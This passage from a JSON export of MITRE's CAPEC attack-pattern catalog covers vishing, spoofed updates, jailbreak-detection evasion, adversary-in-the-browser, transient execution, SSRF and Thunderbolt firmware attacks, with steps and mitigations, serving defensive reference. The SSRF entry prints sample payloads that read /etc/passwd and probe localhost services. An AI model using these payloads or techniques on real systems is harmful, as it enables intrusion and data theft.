entity."]},"Skills_Required":{"Skill":["Basic knowledge about websites: obtaining them, designing and implementing them, etc.",{"Level":"Medium"}]},"Resources_Required":{"Resource":"Legitimate-looking telephone number(s) to initiate calls with victims"},"Indicators":{"Indicator":["You receive a call from an entity that you are not even a customer of prompting you to log into your account.","You receive any call that requests you provide sensitive information.","You are redirected to a website that instructs you to call the number on-screen to address the call-to-action."]},"Consequences":{"Consequence":[{"Scope":["Confidentiality","Access Control","Authorization"],"Impact":"Gain Privileges"},{"Scope":"Confidentiality","Impact":"Read Data"},{"Scope":"Integrity","Impact":"Modify Data"}]},"Mitigations":{"Mitigation":"Do not accept calls from unknown numbers or from numbers that may be flagged as spam. Also, do not call numbers that appear on-screen after being unexpectedly redirected to potentially malicious websites. In either case, do not provide sensitive information over voice calls that are not legitimately initiated. Instead, call your Bank, PayPal, eBay, etc., via the number on their public-facing website and inquire about the problem."},"Example_Instances":{"Example":["The target receives an email or text message stating that their Apple ID has been disabled due to suspicious activity and that the included link includes instructions on how to unlock their Apple account. The link in the text message looks legitimate and once the link is clicked, the user is redirected to a legitimate-looking webpage that prompts the user to call a specified number to initiate the unlock process. The target initiates the phone call and provides their credentials or other sensitive information to the individual they assume works for Apple. Now that the adversary possess this data, it can be used to log into the account to obtain other sensitive data, such as Apple Pay information.","An adversary calls the target and claims to work for their bank. The adversary informs the target that their bank account has been frozen, due to potential fraudulent spending, and requires authentication in order to re-enable the account. The target, believing the caller is a legitimate bank employee, provides their bank account login credentials to confirm they are the authorized owner of the account. The adversary then confirms this authentication and claims that the account has been unlocked. Once the adversary has obtained these credentials, money can be transferred from the victim\'s account to an account controlled by the adversary."]},"References":{"Reference":[{"External_Reference_ID":"REF-592"},{"External_Reference_ID":"REF-594"},{"External_Reference_ID":"REF-595"}]},"Content_History":{"Submission":{"Submission_Name":"CAPEC Content Team","Submission_Organization":"The MITRE Corporation","Submission_Date":"2020-12-17"}}},"657":{"ID":"657","Name":"Malicious Automated Software Update via Spoofing","Abstraction":"Detailed","Status":"Draft","Description":"An attackers uses identify or content spoofing to trick a client into performing an automated software update from a malicious source. A malicious automated software update that leverages spoofing can include content or identity spoofing as well as protocol spoofing. Content or identity spoofing attacks can trigger updates in software by embedding scripted mechanisms within a malicious web page, which masquerades as a legitimate update source. Scripting mechanisms communicate with software components and trigger updates from locations specified by the attackers\' server. The result is the client believing there is a legitimate software update available but instead downloading a malicious update from the attacker.","Likelihood_Of_Attack":"High","Typical_Severity":"High","Related_Attack_Patterns":{"Related_Attack_Pattern":{"Nature":"ChildOf","CAPEC_ID":"186","Exclude_Related":{"Exclude_ID":"403"}}},"Consequences":{"Consequence":{"Scope":["Access Control","Availability","Confidentiality"],"Impact":"Execute Unauthorized Commands"}},"Example_Instances":{"Example":"An example of the spoofing strategy would be the eTrust Antivirus Webscan Automated Update Remote Code Execution vulnerability (CVE-2006-3976) and (CVE-2006-3977) whereby an ActiveX control could be remotely manipulated by an attacker controlled web page to download and execute the attackers\' code without integrity checking."},"Related_Weaknesses":{"Related_Weakness":{"CWE_ID":"494"}},"Taxonomy_Mappings":{"Taxonomy_Mapping":{"Taxonomy_Name":"ATTACK","Entry_ID":"1017","Entry_Name":"Application Deployment Software"}},"Content_History":{"Submission":{"Submission_Name":"CAPEC Content Team","Submission_Organization":"The MITRE Corporation","Submission_Date":"2020-12-17"}}},"660":{"ID":"660","Name":"Root/Jailbreak Detection Evasion via Hooking","Abstraction":"Detailed","Status":"Stable","Description":"An adversary forces a non-restricted mobile application to load arbitrary code or code files, via Hooking, with the goal of evading Root/Jailbreak detection. Mobile device users often Root/Jailbreak their devices in order to gain administrative control over the mobile operating system and/or to install third-party mobile applications that are not provided by authorized application stores (e.g. Google Play Store and Apple App Store). Adversaries may further leverage these capabilities to escalate privileges or bypass access control on legitimate applications. Although many mobile applications check if a mobile device is Rooted/Jailbroken prior to authorized use of the application, adversaries may be able to \\"hook\\" code in order to circumvent these checks. Successfully evading Root/Jailbreak detection allows an adversary to execute administrative commands, obtain confidential data, impersonate legitimate users of the application, and more.","Likelihood_Of_Attack":"Medium","Typical_Severity":"Very High","Related_Attack_Patterns":{"Related_Attack_Pattern":{"Nature":"ChildOf","CAPEC_ID":"251"}},"Execution_Flow":{"Attack_Step":[{"Step":"1","Phase":"Explore","Description":"[Identify application with attack potential] The adversary searches for and identifies a mobile application that could be exploited for malicious purposes (e.g. banking, voting, or medical applications).","Technique":"Search application stores for mobile applications worth exploiting"},{"Step":"2","Phase":"Experiment","Description":"[Develop code to be hooked into chosen target application] The adversary develops code or leverages existing code that will be hooked into the target application in order to evade Root/Jailbreak detection methods.","Technique":["Develop code or leverage existing code to bypass Root/Jailbreak detection methods.","Test the code to see if it works.","Iteratively develop the code until Root/Jailbreak detection methods are evaded."]},{"Step":"3","Phase":"Exploit","Description":"[Execute code hooking to evade Root/Jailbreak detection methods] Once hooking code has been developed or obtained, execute the code against the target application to evade Root/Jailbreak detection methods.","Technique":"Hook code into the target application."}]},"Prerequisites":{"Prerequisite":"The targeted application must be non-restricted to allow code hooking."},"Skills_Required":{"Skill":["Knowledge about Root/Jailbreak detection and evasion techniques.",{"Level":"High"},"Knowledge about code hooking.",{"Level":"Medium"}]},"Resources_Required":{"Resource":["The adversary must have a Rooted/Jailbroken mobile device.","The adversary needs to have enough access to the target application to control the included code or file."]},"Consequences":{"Consequence":[{"Scope":["Integrity","Authorization"],"Impact":"Execute Unauthorized Commands","Note":"Through Root/Jailbreak Detection Evasion via Hooking, the adversary compromises the integrity of the application."},{"Scope":["Confidentiality","Access Control","Authorization"],"Impact":"Gain Privileges"},{"Scope":["Confidentiality","Access Control"],"Impact":"Read Data","Note":"An adversary may leverage Root/Jailbreak Detection Evasion via Hooking in order to obtain sensitive information."}]},"Mitigations":{"Mitigation":["Ensure mobile applications are signed appropriately to avoid code inclusion via hooking.","Inspect the application\'s memory for suspicious artifacts, such as shared objects/JARs or dylibs, after other Root/Jailbreak detection methods.","Inspect the application\'s stack trace for suspicious method calls.","Allow legitimate native methods, and check for non-allowed native methods during Root/Jailbreak detection methods.","For iOS applications, ensure application methods do not originate from outside of Apple\'s SDK."]},"Example_Instances":{"Example":["An adversary targets a non-restricted iOS banking application in an attempt to compromise sensitive user data. The adversary creates Objective-C runtime code that always returns \\"false\\" when checking for the existence of the Cydia application. The malicious code is then dynamically loaded into the application via the DYLD_INSERT_LIBRARIES environment variable. When the banking applications checks for Cydia, the hooked code returns \\"false\\", so the application assumes the device is stock (i.e. not Jailbroken) and allows it to access the application. However, the adversary has just evaded Jailbreak detection and is now able to glean user credentials and/or transaction details.","An adversary targets a mobile voting application on an Android device with the goal of committing voter fraud. Leveraging the Xposed framework, the adversary is able to create and hook Java code into the application that bypasses Root detection methods. When the voting application attempts to detect a Rooted device by checking for commonly known installed packages associated with Rooting, the hooked code removes the suspicious packages before returning to the application. As a result, the application believes the device is stock (i.e. not Rooted) when in actuality this is not the case. Having evading Root detection, the adversary is now able to cast votes for the candidate of their choosing as a variety of different users."]},"Related_Weaknesses":{"Related_Weakness":{"CWE_ID":"829"}},"Taxonomy_Mappings":{"Taxonomy_Mapping":{"Taxonomy_Name":"ATTACK","Entry_ID":"1055","Entry_Name":"Process Injection"}},"References":{"Reference":[{"External_Reference_ID":"REF-624"},{"External_Reference_ID":"REF-625"},{"External_Reference_ID":"REF-626"},{"External_Reference_ID":"REF-627"}]},"Content_History":{"Submission":{"Submission_Name":"CAPEC Content Team","Submission_Organization":"The MITRE Corporation","Submission_Date":"2020-12-17"}}},"661":{"ID":"661","Name":"Root/Jailbreak Detection Evasion via Debugging","Abstraction":"Detailed","Status":"Stable","Description":"An adversary inserts a debugger into the program entry point of a mobile application to modify the application binary, with the goal of evading Root/Jailbreak detection. Mobile device users often Root/Jailbreak their devices in order to gain administrative control over the mobile operating system and/or to install third-party mobile applications that are not provided by authorized application stores (e.g. Google Play Store and Apple App Store). Rooting/Jailbreaking a mobile device also provides users with access to system debuggers and disassemblers, which can be leveraged to exploit applications by dumping the application\'s memory at runtime in order to remove or bypass signature verification methods. This further allows the adversary to evade Root/Jailbreak detection mechanisms, which can result in execution of administrative commands, obtaining confidential data, impersonating legitimate users of the application, and more.","Likelihood_Of_Attack":"Medium","Typical_Severity":"Very High","Related_Attack_Patterns":{"Related_Attack_Pattern":[{"Nature":"ChildOf","CAPEC_ID":"121"},{"Nature":"CanPrecede","CAPEC_ID":"68"},{"Nature":"CanPrecede","CAPEC_ID":"660"}]},"Execution_Flow":{"Attack_Step":[{"Step":"1","Phase":"Explore","Description":"[Identify application with attack potential] The adversary searches for and identifies a mobile application that could be exploited for malicious purposes (e.g. banking, voting, or medical applications).","Technique":"Search application stores for mobile applications worth exploiting"},{"Step":"2","Phase":"Experiment","Description":"[Debug the target application] The adversary inserts the debugger into the program entry point of the mobile application, after the application\'s signature has been identified, to dump its memory contents.","Technique":["Insert the debugger at the mobile application\'s program entry point, after the application\'s signature has been identified.","Dump the memory region containing the now decrypted code from the address space of the binary."]},{"Step":"3","Phase":"Experiment","Description":"[Remove application signature verification methods] Remove signature verification methods from the decrypted code and resign the application with a self-signed certificate."},{"Step":"4","Phase":"Exploit","Description":"[Execute the application and evade Root/Jailbreak detection methods] The application executes with the self-signed certificate, while believing it contains a trusted certificate. This now allows the adversary to evade Root/Jailbreak detection via code hooking or other methods.","Technique":"Optional: Hook code into the target application."}]},"Prerequisites":{"Prerequisite":"A debugger must be able to be inserted into the targeted application."},"Skills_Required":{"Skill":["Knowledge about Root/Jailbreak detection and evasion techniques.",{"Level":"High"},"Knowledge about runtime debugging.",{"Level":"Medium"}]},"Resources_Required":{"Resource":"The adversary must have a Rooted/Jailbroken mobile device with debugging capabilities."},"Consequences":{"Consequence":[{"Scope":["Integrity","Authorization"],"Impact":"Execute Unauthorized Commands","Note":"Through Root/Jailbreak Detection Evasion via Debugging, the adversary compromises the integrity of the application."},{"Scope":["Confidentiality","Access Control","Authorization"],"Impact":"Gain Privileges"},{"Scope":["Confidentiality","Access Control"],"Impact":"Read Data","Note":"An adversary may leverage Root/Jailbreak Detection Evasion via Debugging in order to obtain sensitive information."}]},"Mitigations":{"Mitigation":"Instantiate checks within the application code that ensures debuggers are not attached."},"Example_Instances":{"Example":"An adversary targets an iOS banking application in an attempt to compromise sensitive user data. The adversary launches the application with the iOS debugger and sets a breakpoint at the program entry point, after the application\'s signature has been verified. Next, the adversary dumps the memory region that contains the decrypted code from the address space of the binary. The \'Restrict\' flag is then stripped from the application and the adversary resigns the application with a self-signed certificate. The application is now executed without the \'Restrict\' flag, while trusting the self-signed certificate to be legitimate. However, the adversary is now able to evaded Jailbreak detection via code hooking or other methods and can glean user credentials and/or transaction details."},"Related_Weaknesses":{"Related_Weakness":{"CWE_ID":"489"}},"References":{"Reference":[{"External_Reference_ID":"REF-625"},{"External_Reference_ID":"REF-626"},{"External_Reference_ID":"REF-627"},{"External_Reference_ID":"REF-628"}]},"Content_History":{"Submission":{"Submission_Name":"CAPEC Content Team","Submission_Organization":"The MITRE Corporation","Submission_Date":"2020-12-17"}}},"662":{"ID":"662","Name":"Adversary in the Browser (AiTB)","Abstraction":"Standard","Status":"Stable","Description":{"p":"An adversary exploits security vulnerabilities or inherent functionalities of a web browser, in order to manipulate traffic between two endpoints. This attack first requires the adversary to trick the victim into installing a Trojan Horse application on their system, such as a malicious web browser plugin, which the adversary then leverages to mount the attack. The victim interacts with a web application, such as a banking website, in a normal manner and under the assumption that the connection is secure. However, the adversary can now alter and/or reroute traffic between the client application (e.g., web browser) and the coinciding endpoint, while simultaneously displaying intended transactions and data back to the user. The adversary may also be able to glean cookies, HTTP sessions, and SSL client certificates, which can be used to pivot into an authenticated intranet. Identifying AITB is often difficult because these attacks are successful even when security mechanisms such as SSL/PKI and multifactor authentication are present, since they still function as intended during the attack."},"Alternate_Terms":{"Alternate_Term":[{"Term":"Man in the Browser"},{"Term":"Boy in the Browser"},{"Term":"Man in the Mobile"}]},"Likelihood_Of_Attack":"High","Typical_Severity":"Very High","Related_Attack_Patterns":{"Related_Attack_Pattern":{"Nature":"ChildOf","CAPEC_ID":"94"}},"Execution_Flow":{"Attack_Step":[{"Step":"1","Phase":"Experiment","Description":"The adversary tricks the victim into installing the Trojan Horse malware onto their system.","Technique":"Conduct phishing attacks, drive-by malware installations, or masquerade malicious browser extensions as being legitimate."},{"Step":"2","Phase":"Experiment","Description":"The adversary inserts themself into the communication channel initially acting as a routing proxy between the two targeted components."},{"Step":"3","Phase":"Exploit","Description":"The adversary observes, filters, or alters passed data of their choosing to gain access to sensitive information or to manipulate the actions of the two target components for their own purposes."}]},"Prerequisites":{"Prerequisite":["The adversary must install or convince a user to install a Trojan.","There are two components communicating with each other.","An attacker is able to identify the nature and mechanism of communication between the two target components.","Strong mutual authentication is not used between the two target components yielding opportunity for adversarial interposition.","For browser pivoting, the SeDebugPrivilege and a high-integrity process must both exist to execute this attack."]},"Skills_Required":{"Skill":["Tricking the victim into installing the Trojan is often the most difficult aspect of this attack. Afterwards, the remainder of this attack is fairly trivial.",{"Level":"Medium"}]},"Consequences":{"Consequence":[{"Scope":"Integrity","Impact":"Modify Data"},{"Scope":["Confidentiality","Access Control","Authorization"],"Impact":"Gain Privileges"},{"Scope":"Confidentiality","Impact":"Read Data"}]},"Mitigations":{"Mitigation":["Ensure software and applications are only downloaded from legitimate and reputable sources, in addition to conducting integrity checks on the downloaded component.","Leverage anti-malware tools, which can detect Trojan Horse malware.","Use strong, out-of-band mutual authentication to always fully authenticate both ends of any communications channel.","Limit user permissions to prevent browser pivoting.","Ensure browser sessions are regularly terminated and when their effective lifetime ends."]},"Example_Instances":{"Example":[{"p":"An adversary conducts a phishing attack and tricks a victim into installing a malicious browser plugin. The adversary then positions themself between the victim and their banking institution. The victim begins by initiating a funds transfer from their personal savings to their personal checking account. Using injected JavaScript, the adversary captures this request and modifies it to transfer an increased amount of funds to an account that they controls, before sending it to the bank. The bank processes the transfer and sends the confirmation notice back to the victim, which is instead intercepted by the adversary. The adversary modifies the confirmation to reflect the original transaction details and sends this modified message back to the victim. Upon receiving the confirmation, the victim assumes the transfer was successful and is unaware that their money has just been transferred to the adversary."},{"p":"In 2020, the Agent Tesla malware was leveraged to conduct AiTB attacks against organizations within the gas, oil, and other energy sectors. The malware was delivered via a spearphishing campaign and has the capability to form-grab, keylog, copy clipboard data, extract credentials, and capture screenshots. [REF-630]"},{"p":"Boy in the browser attacks are a subset of AiTB attacks. Similar to AiTB attacks, the adversary must first trick the victim into installing a Trojan, either via social engineering or drive-by-download attacks. The malware then modifies the victim\'s \\"hosts\\" file in order to reroute web traffic from an intended website to an adversary-controlled website that mimics the legitimate website. The adversary is now able to observe, intercept, and/or modify all traffic, as in a traditional Adversary in the Middle attack (CAPEC-94). BiTB attacks are low-cost, easy to execute, and more difficult to detect since the malware often removes itself once the attack has concluded. [REF-631]"},{"p":"Man in the Mobile attacks are a subset of AiTB attacks that target mobile device users. Like AiTB attacks, an adversary convinces a victim to install a Trojan mobile application on their mobile device, often under the guise of security. Once the victim has installed the application, the adversary can capture all SMS traffic to bypass SMS-based out-of-band authentication systems. [REF-632]"}]},"Related_Weaknesses":{"Related_Weakness":[{"CWE_ID":"300"},{"CWE_ID":"494"}]},"Taxonomy_Mappings":{"Taxonomy_Mapping":[{"Taxonomy_Name":"ATTACK","Entry_ID":"1185","Entry_Name":"Man in the Browser"},{"Taxonomy_Name":"OWASP Attacks","Entry_Name":"Man-in-the-browser attack"}]},"References":{"Reference":[{"External_Reference_ID":"REF-629"},{"External_Reference_ID":"REF-630"},{"External_Reference_ID":"REF-631"},{"External_Reference_ID":"REF-632"}]},"Content_History":{"Submission":{"Submission_Name":"CAPEC Content Team","Submission_Organization":"The MITRE Corporation","Submission_Date":"2021-06-24"}}},"663":{"ID":"663","Name":"Exploitation of Transient Instruction Execution","Abstraction":"Standard","Status":"Stable","Description":"An adversary exploits a hardware design flaw in a CPU implementation of transient instruction execution to expose sensitive data and bypass/subvert access control over restricted resources. Typically, the adversary conducts a covert channel attack to target non-discarded microarchitectural changes caused by transient executions such as speculative execution, branch prediction, instruction pipelining, and/or out-of-order execution. The transient execution results in a series of instructions (gadgets) which construct covert channel and access/transfer the secret data.","Likelihood_Of_Attack":"Low","Typical_Severity":"Very High","Related_Attack_Patterns":{"Related_Attack_Pattern":[{"Nature":"ChildOf","CAPEC_ID":"74"},{"Nature":"ChildOf","CAPEC_ID":"184","Exclude_Related":{"Exclude_ID":"403"}},{"Nature":"CanPrecede","CAPEC_ID":"141"},{"Nature":"PeerOf","CAPEC_ID":"212"},{"Nature":"PeerOf","CAPEC_ID":"124"},{"Nature":"PeerOf","CAPEC_ID":"180"}]},"Execution_Flow":{"Attack_Step":[{"Step":"1","Phase":"Explore","Description":"[Survey target application and relevant OS shared code libraries] Adversary identifies vulnerable transient instruction sets and the code/function calls to trigger them as well as instruction sets or code fragments (gadgets) to perform attack.","Technique":"Utilize Disassembler and Debugger tools to examine and trace instruction set execution of source code and shared code libraries on a system."},{"Step":"2","Phase":"Explore","Description":"[Explore cache and identify impacts] Utilize tools to understand the impact of transient instruction execution upon address spaces and CPU operations.","Technique":"Run OS or application specific tools that examine the contents of cache."},{"Step":"1","Phase":"Experiment","Description":"[Cause conditions for identified transient instruction set execution] Adversary ensures that specific code/instructions of the target process are executed by CPU, so desired transient instructions are executed."},{"Step":"2","Phase":"Experiment","Description":"[Cause specific secret data to be cached from restricted address space] Executed instruction sets (gadgets) in target address space, initially executed via adversary-chosen transient instructions sets, establish covert channel and transfer secret data across this channel to cache.","Technique":["Prediction-based - adversary trains CPU to incorrectly predict/speculate conditions for instruction execution to be true, hence executing adversary-chosen transient instructions. These prediction-based methods include: Pattern History Table (PHT)/Input Validation Bypass, Branch Target Buffer (BTB)/Branch Target Injection, Return Stack Buffer (RSB)/Return Address Injection, and Store To Load (STL)/Speculative Store Bypass.","Exception/Fault-based - adversary has CPU execute transient instructions that raise an exception allowing inaccessible memory space to be accessed via out-of-order execution. These exception/fault-based methods include: Supervisor-only Bypass, Virtual Translation Bypass, System Register Bypass, FPU Register Bypass, Read-only Bypass, Protection Key Bypass, and Bounds Check Bypass."]},{"Step":"1","Phase":"Exploit","Description":"[Perform covert channel attack to obtain/access secret data] Adversary process code removes instructions/data from shared cache set, waits for target process to reinsert them back into cache, to identify location of secret data via a timing method. Adversary continuously repeat this process to identify and access entirety of targeted secret data.","Technique":["Flush+Reload - adversary frequently flushes targeted memory cache line using a dedicated machine flush instruction, and uses another process to measure time taken for CPU to load victim secret data.","Evict+Time - adversary causes victim to load target set into cache and measures time for victim process to load this data, setting a baseline. Adversary evicts a specified cache line and causes victim process to execute again, and measures any change in execution time, to determine if cache line was accessed.","Prime+Probe - adversary primes cache by filling cache line(s) or set(s) with data, after some time victim process evicts this adversary data to replace it with secret data. The adversary then probes/accesses all the previously accessed cache lines detecting cache misses, which determine that their attacker data has been evicted and replaced with secret data from victim process."]}]},"Prerequisites":{"Prerequisite":"The adversary needs at least user execution access to a system and a maliciously crafted program/application/process with unprivileged code to misuse transient instruction set execution of the CPU."},"Skills_Required":{"Skill":["Detailed knowledge on how various CPU architectures and microcode perform transient execution for various low-level assembly language code instructions/operations.",{"Level":"High"},"Detailed knowledge on compiled binaries and operating system shared libraries of instruction sequences, and layout of application and OS/Kernel address spaces for data leakage.",{"Level":"High"}]},"Resources_Required":{"Resource":["C2C mechanism or direct access to victim system, capable of dropping malicious program and collecting covert channel attack data.","Malicious program capable of triggering execution of transient instructions or vulnerable instruction sequences of victim program and performing a covert channel attack to gather data from victim process memory space. Ultimately, the speed with which an attacker discovers a secret is directly proportional to the computational resources of the victim machine."]},"Indicators":{"Indicator":"File Signatures for Malicious Software capable of abusing Transient Instruction Set Execution"},"Consequences":{"Consequence":[{"Scope":"Confidentiality","Impact":"Read Data"},{"Scope":"Access Control","Impact":"Bypass Protection Mechanism"},{"Scope":"Authorization","Impact":"Execute Unauthorized Commands"}]},"Mitigations":{"Mitigation":["Implementation: DAWG (Dynamically Allocated Way Guard) - processor cache properly divided between different programs/processes that don\'t share resources","Implementation: KPTI (Kernel Page-Table Isolation) to completely separate user-space and kernel space page tables","Configuration: Architectural Design of Microcode to limit abuse of speculative execution and out-of-order execution","Configuration: Disable SharedArrayBuffer for Web Browsers","Configuration: Disable Copy-on-Write between Cloud VMs","Configuration: Privilege Checks on Cache Flush Instructions","Implementation: Non-inclusive Cache Memories to prevent Flush+Reload Attacks"]},"Example_Instances":{"Example":{"p":"A web browser with user-privileges executes JavaScript code imbedded within a malicious website. The system does not disable shared buffers for the web browser and there is no restriction or check upon user-process execution of flush or evict instructions. The Javascript code executes vulnerable transient instructions upon system to cause microarchitectural changes that establish covert channel and transfer sensitive/secret data into shared cache from address space of either kernel, web browser or another executing process on the system."}},"Related_Weaknesses":{"Related_Weakness":[{"CWE_ID":"1037"},{"CWE_ID":"1303"},{"CWE_ID":"1264"}]},"References":{"Reference":[{"External_Reference_ID":"REF-637"},{"External_Reference_ID":"REF-638"},{"External_Reference_ID":"REF-639"},{"External_Reference_ID":"REF-640"},{"External_Reference_ID":"REF-641"},{"External_Reference_ID":"REF-642"},{"External_Reference_ID":"REF-643"}]},"Content_History":{"Submission":{"Submission_Name":"CAPEC Content Team","Submission_Organization":"The MITRE Corporation","Submission_Date":"2021-06-24"}}},"664":{"ID":"664","Name":"Server Side Request Forgery","Abstraction":"Standard","Status":"Stable","Description":{"p":"An adversary exploits improper input validation by submitting maliciously crafted input to a target application running on a server, with the goal of forcing the server to make a request either to itself, to web services running in the server\u2019s internal network, or to external third parties. If successful, the adversary\u2019s request will be made with the server\u2019s privilege level, bypassing its authentication controls. This ultimately allows the adversary to access sensitive data, execute commands on the server\u2019s network, and make external requests with the stolen identity of the server. Server Side Request Forgery attacks differ from Cross Site Request Forgery attacks in that they target the server itself, whereas CSRF attacks exploit an insecure user authentication mechanism to perform unauthorized actions on the user\'s behalf."},"Likelihood_Of_Attack":"High","Typical_Severity":"High","Related_Attack_Patterns":{"Related_Attack_Pattern":{"Nature":"ChildOf","CAPEC_ID":"115"}},"Execution_Flow":{"Attack_Step":[{"Step":"1","Phase":"Explore","Description":"[Find target application] Find target web application that accepts a user input and retrieves data from the server"},{"Step":"2","Phase":"Experiment","Description":"[Examine existing application requests] Examine HTTP/GET requests to view the URL query format. Adversaries test to see if this type of attack is possible through weaknesses in an application\'s protection to Server Side Request Forgery","Technique":["Attempt manipulating the URL to retrieve an error response/code from the server to determine if URL/request validation is done.","Use a list of XSS probe strings to specify as parameters to known URLs. If possible, use probe strings with unique identifiers.","Create a GET request with a common server file path such as /etc/passwd as a parameter and examine output."]},{"Step":"3","Phase":"Exploit","Description":"[Malicious request] Adversary crafts a malicious URL request that assumes the privilege level of the server to query internal or external network services and sends the request to the application"}]},"Prerequisites":{"Prerequisite":"Server must be running a web application that processes HTTP requests."},"Skills_Required":{"Skill":["The adversary will have to detect the vulnerability through an intermediary service or specify maliciously crafted URLs and analyze the server response.",{"Level":"Medium"},"The adversary will be required to access internal resources, extract information, or leverage the services running on the server to perform unauthorized actions such as traversing the local network or routing a reflected TCP DDoS through them.",{"Level":"High"}]},"Resources_Required":{"Resource":"[None] No specialized resources are required to execute this type of attack."},"Consequences":{"Consequence":[{"Scope":["Integrity","Confidentiality","Availability"],"Impact":"Modify Data"},{"Scope":"Confidentiality","Impact":"Read Data"},{"Scope":"Availability","Impact":"Resource Consumption"}]},"Mitigations":{"Mitigation":["Handling incoming requests securely is the first line of action to mitigate this vulnerability. This can be done through URL validation.","Further down the process flow, examining the response and verifying that it is as expected before sending would be another way to secure the server.","Allowlist the DNS name or IP address of every service the web application is required to access is another effective security measure. This ensures the server cannot make external requests to arbitrary services.","Requiring authentication for local services adds another layer of security between the adversary and internal services running on the server. By enforcing local authentication, an adversary will not gain access to all internal services only with access to the server.","Enforce the usage of relevant URL schemas. By limiting requests be made only through HTTP or HTTPS, for example, attacks made through insecure schemas such as file://, ftp://, etc. can be prevented."]},"Example_Instances":{"Example":[{"p":["An e-commerce website allows a customer to filter results by specific categories. When the customer selects the category of choice, the web shop queries a back-end service to retrieve the requested products. The request may look something like:","A malicious user can modify the request URL to look like this instead:","or","or","If the exploit is successful, the server may return the data requested by the adversary"],"div":[{"class":"informative","p":["POST /product/category HTTP/1.0","Content-Type: application/x-www-form-urlencoded","Content-Length: 200","vulnerableService=http://vulnerableshop.net:8080/product/category/check%3FcategoryName%3DsomeCategory"]},{"class":"attack","p":["POST /product/category HTTP/1.0","Content-Type: application/x-www-form-urlencoded","Content-Length: 200","vulnerableService=http://localhost/server-status"]},{"class":"attack","p":"vulnerableService = file:///etc/passwd"},{"class":"attack","p":"vulnerableService=dict://localhost:12345/info"},{"class":"bad","p":["root:!:0:0::/:/usr/bin/ksh","daemon:!:1:1::/etc:","bin:!:2:2::/bin:","sys:!:3:3::/usr/sys:","adm:!:4:4::/var/adm:","uucp:!:5:5::/usr/lib/uucp:","guest:!:100:100::/home/guest:","nobody:!:4294967294:4294967294::/:","lpd:!:9:4294967294::/:","lp:*:11:11::/var/spool/lp:/bin/false","invscout:*:200:1::/var/adm/invscout:/usr/bin/ksh","nuucp:*:6:5:uucp login user:/var/spool/uucppublic:/usr/sbin/uucp/uucico","paul:!:201:1::/home/paul:/usr/bin/ksh","jdoe:*:202:1:My name:/home/myname:/usr/bin/ksh"]}]},{"p":"The CallStranger attack is an observed example of SSRF. It specifically targets the UPnP (Universal Plug and Play) protocol used by various network devices and gaming consoles. To execute the attack, an adversary performs a scan of the LAN to discover UPnP enabled devices, and subsequently a list of UPnP services they use. Once the UPnP service endpoints are listed, a vulnerability in the UPnP protocol is used to send these endpoints as encrypted to a verification server via the UPnP Callback method. Because the encryption is done on the client side, the server returns an encrypted list of services which is decrypted on the client side. The adversary then has a list of services running the vulnerable UPnP protocol, which the adversary can leverage to make spoofed requests. [REF-646]"}]},"Related_Weaknesses":{"Related_Weakness":[{"CWE_ID":"918"},{"CWE_ID":"20"}]},"References":{"Reference":[{"External_Reference_ID":"REF-644"},{"External_Reference_ID":"REF-645"},{"External_Reference_ID":"REF-646"}]},"Content_History":{"Submission":{"Submission_Name":"CAPEC Content Team","Submission_Organization":"The MITRE Corporation","Submission_Date":"2021-06-24"},"Modification":{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2021-10-21","Modification_Comment":"Updated Execution_Flow"}}},"665":{"ID":"665","Name":"Exploitation of Thunderbolt Protection Flaws","Abstraction":"Detailed","Status":"Stable","Description":{"p":"An adversary leverages a firmware weakness within the Thunderbolt protocol, on a computing device to manipulate Thunderbolt controller firmware in order to exploit vulnerabilities in the implementation of authorization and verification schemes within Thunderbolt protection mechanisms. Upon gaining physical access to a target device, the adversary conducts high-level firmware manipulation of the victim Thunderbolt controller SPI (Serial Peripheral Interface) flash, through the use of a SPI Programing device and an external Thunderbolt device, typically as the target device is booting up. If successful, this allows the adversary to modify memory, subvert authentication mechanisms, spoof identities and content, and extract data and memory from the target device. Currently 7 major vulnerabilities exist within Thunderbolt protocol with 9 attack vectors as noted in the Execution Flow."},"Likelihood_Of_Attack":"Low","Typical_Severity":"Very High","Related_Attack_Patterns":{"Related_Attack_Pattern":[{"Nature":"ChildOf","CAPEC_ID":"276"},{"Nature":"CanFollow","CAPEC_ID":"390"},{"Nature":"PeerOf","CAPEC_ID":"458"},{"Nature":"PeerOf","CAPEC_ID":"148"},{"Nature":"PeerOf","CAPEC_ID":"151"}]},"Execution_Flow":{"Attack_Step":[{"Step":"1","Phase":"Explore","Description":"[Survey physical victim environment and potential Thunderbolt system targets] The adversary monitors the target\'s physical environment to identify systems with Thunderbolt interfaces, identify potential weaknesses in physical security in addition to periods of nonattendance by the victim over their Thunderbolt interface equipped devices, and when the devices are in locked or sleep state."},{"Step":"2","Phase":"Explore","Description":"[Evaluate the target system and its Thunderbolt interface] The adversary determines the device\'s operating system, Thunderbolt interface version, and any implemented Thunderbolt protections to plan the attack."},{"Step":"1","Phase":"Experiment","Description":"[Obtain and/or clone firmware image] The adversary physically manipulates Thunderbolt enabled devices to acquire the firmware image from the target and/or adversary Thunderbolt host controller\'s SPI (Serial Peripheral Interface) flash.","Technique":["Disassemble victim and/or adversary device enclosure with basic tools to gain access to Thunderbolt controller SPI flash by connecting adversary SPI programmer.","Adversary connects SPI programmer to adversary-controlled Thunderbolt enabled device to obtain/clone victim thunderbolt controller firmware image through tools/scripts.","Clone firmware image with SPI programmer and tools/scripts on adversary-controlled device."]},{"Step":"2","Phase":"Experiment","Description":"[Parse and locate relevant firmware data structures and information based upon Thunderbolt controller model, firmware version, and other information] The acquired victim and/or adversary firmware image is parsed for specific data and other relevant identifiers required for exploitation, based upon the victim device information and firmware version.","Technique":["Utilize pre-crafted tools/scripts to parse and locate desired firmware data and modify it.","Locate DROM (Device Read Only Memory) data structure section and calculate/determine appropriate offset to replicate victim device UUID.","Locate ACL (Access Control List) data structure and calculate/determine appropriate offsets to identify victim device UUID.","Locate data structure containing challenge-response key information between appropriate offsets."]},{"Step":"3","Phase":"Experiment","Description":"[Disable Thunderbolt security and prevent future Thunderbolt security modifications (if necessary)] The adversary overrides the target device\'s Thunderbolt Security Level to \\"None\\" (SL0) and/or enables block protections upon the SPI flash to prevent the ability for the victim to perform and/or recognize future Thunderbolt security modifications as well as update the Thunderbolt firmware.","Technique":"The adversary-controlled Thunderbolt device, connected to SPI programmer and victim device via Thunderbolt ports, is utilized to execute commands within tools/scripts to disable SPI flash protections, modify Thunderbolt Security Level, and enable malicious SPI flash protections."},{"Step":"4","Phase":"Experiment","Description":"[Modify/replace victim Thunderbolt firmware image] The modified victim and/or 